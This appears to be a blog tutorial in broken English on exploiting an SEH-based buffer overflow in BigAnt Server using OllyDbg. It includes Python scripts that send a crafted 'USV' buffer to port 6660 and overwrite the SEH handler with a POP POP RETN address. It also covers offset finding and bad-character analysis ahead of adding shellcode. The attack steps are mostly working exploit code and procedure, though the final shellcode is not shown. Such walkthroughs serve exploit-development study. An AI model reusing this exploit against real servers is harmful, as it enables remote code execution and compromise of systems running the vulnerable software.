- OllyDbg (Debugger)
- BigAnt Server (Target Aplication SEH)
- Fuzzer
1. Create Fuzzer
Port : 6660
Address : 192.168.56.102 (we get from Bigant Servet IP)
fuzzer will create "A" until 2500 string
run Bigant Server
after attach AntServ, run fuzzer..and debug look at register ESI filed "AAAA.." but register EIP not overwrite.. but aplication Crash
this Aplication using SEH, we must klik menu View>SEH chain
buffer send cleary seen saved in SEH Chain.. ,to trasmit char into the EIP prse Shift + F9
after that,, Follow Dump..
2. Baypass SEH
search POP POP RETN
View > executable Modules double klik VBAJET32.DLL
restart BigAnt Server and OllyDbg, pair Break pnoit, like fisrt Step..
run fuzzer,, and cehk SEH chain, pres F9 for bayy pass SEH, write and remember EIP ersgister Address..
EIP : 42326742
use Pattern_ offset..
conclusion : we need buffer 966 byte to SEH Handler, edit fuzzer.
#!/usr/bin/python
import socket
target_addres="192.168.56.102"
target_port=6660
buffer="USV "
buffer+="\x90"*962
buffer+="\xCC\xCC\xCC\xCC"
buffer+="\x41\x41\x41\x41"
buffer+="\x90"*(2504-len(buffer))
buffer+="\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_addres, target_port))
sock.send(buffer)
sock.close()
3. Control CPU
look SEH : 0F9A196A
#!/usr/bin/python
import socket
target_addres="192.168.56.102"
target_port=6660
buffer="USV "
buffer+="\x90"*962
buffer+="\xCC\xCC\xCC\xCC"
buffer+="\x6A\x19\x9A\x0F" #SEH Overwrite buffer+="\x90"*(2504-len(buffer))
buffer+="\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_addres, target_port))
sock.send(buffer)
sock.close()
do like first step and pair break point,
and then
debug.. but we get memory 4 byte.. this not enought..
we want to search memory have long space
4.Shellcode
create payload,,
run fuzzer,
after run fazer check SEH Chain..
SEH handler not valid..
remove payload from fuzzer.. and run again.. before run restart BigAnt Server and ollydbg, check Seh Chain
we must axecute payload line per line to find bad charackter
use Generatecodes
root@bt:/opt# perl generatecodes.pl 00,0a,0d
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0e\x0f\x10\x11"
"\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f"
"\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e"
"\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d"
"\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c"
"\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b"
"\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a"
"\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89"
"\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98"
"\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7"
"\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6"
"\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5"
"\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4"
"\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3"
"\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2"
"\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
restrat BigAnt server and OllyDbg, pair breakpoint
firat line
second
finally, we get \x20 is bad caracter..
add on payload generator.. edit fuzzer using payload
restar OllyDBG and BigAnt server. pair breakpoint. run fuzzer
5. Check Bad charackter in Buffer
0x00 0x0a 0x0d 0x40 0x20 0x25
edit fuzzer use payload
runn telnet
Tidak ada komentar:
Posting Komentar